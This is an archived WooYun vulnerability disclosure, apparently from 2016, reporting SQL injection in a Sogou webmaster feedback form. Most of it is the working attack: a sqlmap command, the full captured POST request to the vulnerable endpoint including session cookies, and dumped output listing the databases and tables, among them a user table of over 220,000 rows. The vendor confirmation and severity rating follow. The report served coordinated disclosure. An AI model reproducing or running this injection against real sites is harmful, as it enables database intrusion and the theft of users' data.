乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-15: 细节已通知厂商并且等待厂商处理中 2016-05-16: 厂商已经确认,细节仅向厂商公开 2016-05-26: 细节向核心白帽子及相关领域专家公开 2016-06-05: 细节向普通白帽子公开 2016-06-15: 细节向实习白帽子公开 2016-06-30: 细节向公众公开
RT
http://fankui.help.sogou.com/index.php/web/web/index?type=6 抓包看了下 加个单引号报错防不胜防
sqlmap语法:sqlmap.py -r 1.txt --dbs----------------数据包-------POST /index.php/web/web/addShenSu HTTP/1.1Host: fankui.help.sogou.comProxy-Connection: keep-aliveContent-Length: 120Accept: application/json, text/javascript, */*; q=0.01Origin: http://fankui.help.sogou.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; ld=Hkllllllll2g2sZqlllllVtL@xUlllllT66QhZllll9lllllRklll5@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=
数据库信息available databases [3]:[*] information_schema[*] sogou_zhanzhang[*] test
当前库表信息Database: sogou_zhanzhang+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| deadlink_wap_data | 15191050 || url_submit | 547950 || url_submit_view | 547950 || website | 270697 || website_view | 270697 || `user` | 220754 || sitemap | 175918 || sitemap_copy | 175417 || sitemap_view | 168249 || site_name | 73232 || website_precision | 67856 || site_name_view | 65060 || fault_block_log | 54773 || sitemap_wap | 52806 || fault_block | 51056 || sitemap_wap_view | 48773 || sitemap_invitation | 45320 || sitemap_invitation_view | 43771 || site_icon | 42416 || site_icon_view | 42067 || spider_pressure_feedback | 31070 || sitemap_invitation_log | 28583 || site_logo | 27750 || site_logo_view | 25608 || site_name_log | 24155 || spider_pressure_feedback_view | 23755 || web2wap | 20046 || web2wap_view | 19268 || site_logo_log | 17607 || renzheng_log | 16555 || supply_fetch | 14501 || site_icon_log | 13925 || renzheng | 9324 || fb_updateshensu | 5427 || fb_shensu | 5341 || web2wap_log | 4917 || fb_img | 3720 || redirection | 3696 || redirection_view | 3696 || tb_member | 3682 || feedback | 3270 || fb_tool | 2906 || feedback_view | 2773 || url_shoulu | 2577 || umis_waitingfavicon_log | 2568 || umis_waitingfavicon | 2520 || site_param | 1992 || sitemap_blacklist | 1917 || site_param_view | 1825 || website_precision_log | 1064 || user_change_log | 968 || redirection_log | 561 || fb_suggestion | 289 || fb_jubao | 201 || fb_record | 153 || renzheng_set | 106 || fb_kuaizhao | 81 || mail_view | 78 || backend_user | 74 || website_log | 63 || product_black_list | 24 || user_invitation | 19 || notice | 18 || fb_updatetool | 14 || website_precision_maxid | 7 || columnist | 5 || partner_white_list | 5 || mail_group | 1 || site_param_log | 1 |+-------------------------------+---------+
过滤
危害等级:高
漏洞Rank:10
确认时间:2016-05-16 08:12
感谢支持
暂无